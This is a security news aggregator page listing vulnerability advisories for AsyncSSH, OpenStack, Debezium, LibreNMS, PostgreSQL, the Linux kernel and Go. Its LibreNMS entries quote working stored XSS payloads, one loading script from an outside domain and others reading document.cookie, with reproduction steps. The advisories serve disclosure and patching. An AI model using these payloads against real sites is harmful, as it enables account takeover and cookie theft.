Security
Headlines
HeadlinesLatestCVEs

Tag

#perl

Ubuntu Security Notice USN-7108-1

Ubuntu Security Notice 7108-1 - Fabian Bäumer, Marcus Brinkmann, and Joerg Schwenk discovered that AsyncSSH did not properly handle the extension info message. An attacker able to intercept communications could possibly use this issue to downgrade the algorithm used for client authentication. Fabian Bäumer, Marcus Brinkmann, and Joerg Schwenk discovered that AsyncSSH did not properly handle the user authentication request message. An attacker could possibly use this issue to control the remote end of an SSH client session via packet injection/removal and shell emulation.

Packet Storm
#vulnerability#ubuntu#perl#auth#ssh
GHSA-2ppf-2m6f-6v6f: OpenStack improperly deletes access rules

A flaw was found in OpenStack. When a user tries to delete a non-existing access rule in it's scope, it deletes other existing access rules which are not associated with any application credentials.

GHSA-hvw5-3mgw-7rcf: Debezium database connector has a script injection vulnerability

A script injection vulnerability was found in the Debezium database connector, where it does not properly sanitize some parameters. This flaw allows an attacker to send a malicious request to inject a parameter that may allow the viewing of unauthorized data.

8.8 Rated PostgreSQL Vulnerability Puts Databases at Risk

Cybersecurity researchers at Varonis have identified a serious security vulnerability in PostgreSQL that could lead to data breaches…

GHSA-p66q-ppwr-q5j8: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/dev-overview-data.inc.php

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the Device Overview page allows authenticated users to inject arbitrary JavaScript through the "overwrite_ip" parameter when editing a device. This vulnerability results in the execution of malicious code when the device overview page is visited, potentially compromising the accounts of other users. ### Details The vulnerability occurs when editing a device. An attacker can inject arbitrary JavaScript into the "overwrite_ip" parameter. This malicious script is then executed in the "Assigned IP" field when the device overview page is loaded. The payload used to exploit this vulnerability is: `test'"><script src=//15.rs></script>` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The root cause of this vulnerability is the application's failure to p...

GHSA-4m5r-w2rq-q54q: LibreNMS has a Persistent XSS from Insecure Input Sanitization Affects Multiple Endpoints

### Summary The application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code. ### Details User with Admin role can edit the Display Name of a device, the application did not properly sanitize the user input in the device Display Name, if java script code is inside the name of the device Display Name, its can be trigger from different sources. ### PoC 1. Use an Admin role user to change the Display Name of a device into the payload `<img src="x" onerror="alert(document.cookie)">` ![image](https://github.com/user-attachments/assets/a0cce15d-fa25-46cf-a16d-648b501724a4) 2.1. Go to manage user and choose Manage Access ![image](https://github.com/user-attachments/assets/079bd7a7-c153-4630-a59e-416bbbaf267b) 2.2. A pop-up will show ![image](https://github.com/user-attachments/assets/2fe15976-c25d-4ba5-a9c1-08cfaa5c1c5b) 3.1. Create a new Alert Rule where it will check if the device is ...

GHSA-c86q-rj37-8f85: LibreNMS has a stored XSS in ExamplePlugin with Device's Notes

### Summary The application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code. ### Details User with Admin role can add Notes to a device, the application did not properly sanitize the user input, when the ExamplePlugin enable, if java script code is inside the device's Notes, its will be trigger. ### PoC 1. As an admin user, enable the ExamplePlugin. ![image](https://github.com/user-attachments/assets/409f3a0c-7fac-46e3-8140-84749a120dd9) 2. Add the payload `<img src="x" onerror="alert(document.cookie)">` into the device Notes ![image](https://github.com/user-attachments/assets/c2a57dbd-ea07-4166-8b29-61be6ad6c2b6) 3. Once visit the Overview of the Device, a pop-up will show up. ![image](https://github.com/user-attachments/assets/3c9b87c3-d010-49e7-bd13-4a715db4e0c3) ### Impact It could allow authenticated users to execute arbitrary JavaScript code in the context of other users'...

Ubuntu Security Notice USN-7089-6

Ubuntu Security Notice 7089-6 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

Ubuntu Security Notice USN-7111-1

Ubuntu Security Notice 7111-1 - Philippe Antoine discovered that Go incorrectly handled crafted HTTP/2 streams. An attacker could possibly use this issue to cause a denial of service. Marten Seemann discovered that Go did not properly manage memory under certain circumstances. An attacker could possibly use this issue to cause a panic resulting in a denial of service. Ameya Darshan and Jakob Ackermann discovered that Go did not properly validate the amount of memory and disk files ReadForm can consume. An attacker could possibly use this issue to cause a panic resulting in a denial of service.

Ubuntu Security Notice USN-7089-5

Ubuntu Security Notice 7089-5 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.